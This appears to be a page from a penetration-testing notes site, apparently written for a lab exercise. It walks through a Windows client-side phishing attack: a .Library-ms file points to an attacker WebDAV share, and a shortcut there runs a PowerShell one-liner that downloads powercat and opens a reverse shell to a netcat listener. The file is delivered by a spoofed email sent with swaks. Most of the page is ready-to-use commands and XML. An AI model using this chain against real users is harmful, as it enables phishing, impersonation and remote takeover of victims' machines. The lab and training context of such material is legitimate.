← Back to search

Windows Library-ms Client-Side Attack

exploitationwindowstool

Summary

Phish a Windows user with a .Library-ms file pointing at an attacker WebDAV share, chaining a malicious shortcut that downloads powercat for a reverse shell.

Walkthrough

This client-side attack emails a victim a Windows .Library-ms file that points to an attacker-controlled WebDAV share; a paired shortcut on the share downloads powercat and returns a reverse shell.

Steps

  1. Set up the WebDAV share on Kali with wsgidav (anonymous auth) serving /home/kali/beyond/webdav/.
  2. Build the Library file (config.Library-ms) whose <url> points at your WebDAV host, and save it to /home/kali/beyond.
  3. Create a shortcut on the share that runs the powercat one-liner; when double-clicked it pulls powercat.ps1 and connects back for a shell.
  4. Serve powercat over HTTP with python3 -m http.server 8000.
  5. Start a Netcat listener on port 4444 to catch the reverse shell.
  6. Send the email with swaks, attaching config.Library-ms. Provide recipients with -t, the spoofed sender with --from, the SMTP server with --server, subject/body via --header/--body, and -ap to enable password authentication.
  7. Wait for the victim to open the Library and trigger the shortcut.

Commands

bash

mkdir /home/kali/beyond/webdav
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/

other

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://<IP></url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

powershell

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>:8000/powercat.ps1'); powercat -c <IP> -p 4444 -e powershell"

bash

python3 -m http.server 8000

bash

nc -nlvp 4444

bash

sudo swaks -t daniela@beyond.com -t marcus@beyond.com \
  --from john@beyond.com --attach @config.Library-ms --server <IP> \
  --body @body.txt --header "Subject: Staging Script" --suppress-data -ap